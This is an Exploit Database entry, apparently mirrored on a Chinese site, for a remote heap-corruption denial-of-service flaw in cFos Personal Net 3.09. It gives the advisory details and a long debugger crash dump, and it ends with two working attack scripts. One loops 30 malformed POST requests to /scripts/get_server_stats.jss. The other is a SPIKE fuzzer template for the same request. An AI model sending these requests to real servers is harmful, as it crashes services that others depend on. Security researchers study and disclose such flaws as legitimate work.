cFos Personal Net 3.09 – Remote Heap Memory Corruption (Denial of Service)

• Exploit Database
• 107 阅读

• 作者： LiquidWorm
  日期： 2014-04-25
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33018/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164

  cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service     Vendor: cFos Software GmbH Product web page: https://www.cfos.de Affected version: 3.09   Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for personal and professional use. For personal use, instead of hosting websites with a webhoster, you just run it on your Windows machine. For professional use, you rent a virtual windows PC or dedicated PC from a webhoster and run it there.   Desc: cFos Personal Net web server is vulnerable to a remote denial of service issue when processing multiple malformed POST requests in less than 3000ms. The issue occurs when the application fails to handle the data sent in the POST requests in a single socket connection causing heap memory corruption which results in a crash of the HTTP service.   SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0   ============================================================================   (658.1448): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88 eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0 nv up ei pl zr na pe nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246 cfospnet+0x54529: 00914529 ff5004calldword ptr [eax+4]ds:002b:feeefef2=???????? 0:024> d ecx 02813dccee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813ddcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813decee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813dfcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e0cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e1cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e2cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e3cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0:024> d 02813e4cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e5cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e6cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e7cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e8cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813e9cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813eacee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813ebcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0:024> d 02813eccee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813edcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813eecee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813efcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813f0cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813f1cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813f2cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813f3cee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21.............f.! 0:024> d 02813f4c8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04.....q-......q-. 02813f5c01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48...._CFPNET_PATH 02813f6c00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04.............A,. 02813f7c0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00............)... 02813f8c2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00/............... 02813f9c00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04.....f.8.....1,. 02813facd0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813fbcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0:024> d 02813fccee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813fdcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813fecee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 02813ffcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281400cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281401cee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f.............f./ 0281402cc6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00........n.a.m.e. 0281403c3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00=............... 0:024> d 0281404c00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02.....f."....`... 0281405c10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe..+............. 0281406cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281407cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281408cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281409cee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21.............f.! 028140acdc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02........07...K.. 028140bc00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00....REQUEST_URI. 0:024> d 028140cc0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02.............A.. 028140dc0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00................ 028140ec1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00................ 028140fc00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72.....f.-..../scr 0281410c69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5fipts/get_server_ 0281411c73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab abstats.jss....... 0281412cab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f.............f.? 0281413cd0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe.....J,...-..... 0:024> d 0281414cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281415cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281416cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281417cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281418cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0281419cee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 028141acee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 028141bcee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe................ 0:024> d esi 028198b00d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028198c00d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028198d00d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028198e00d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028198f00d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028199000d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028199100d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................ 028199200d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba................   ============================================================================     Tested on: Microsoft Windows 7 Professional SP1 (EN)     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2014-5184 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php     01.04.2014   ---     -ALGjlang   open_socket(); for(j=1;j<=30;j++) { send_socket(" POST /scripts/get_server_stats.jss?name= HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* Host: 192.168.0.107 Content-Length: 20   AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a ") } close_socket();     -SPKfzz   s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n"); s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n"); s_string("Accept: */*"); s_string("Host: 192.168.0.107\r\n"); s_string("Content-Length: "); s_blocksize_string("fuzz",15); s_string("\r\n\r\n");   s_block_start("fuzz"); s_string("joxypoxyjoxypoxy!!\r\n\" * 100); s_string_variable("ZSL"); s_string("\r\n"); //importante s_block_end("fuzz");